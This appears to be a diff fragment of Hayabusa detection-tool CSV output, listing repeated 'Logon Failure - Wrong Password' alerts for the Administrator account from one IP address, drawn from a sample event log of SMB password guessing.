+2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: 
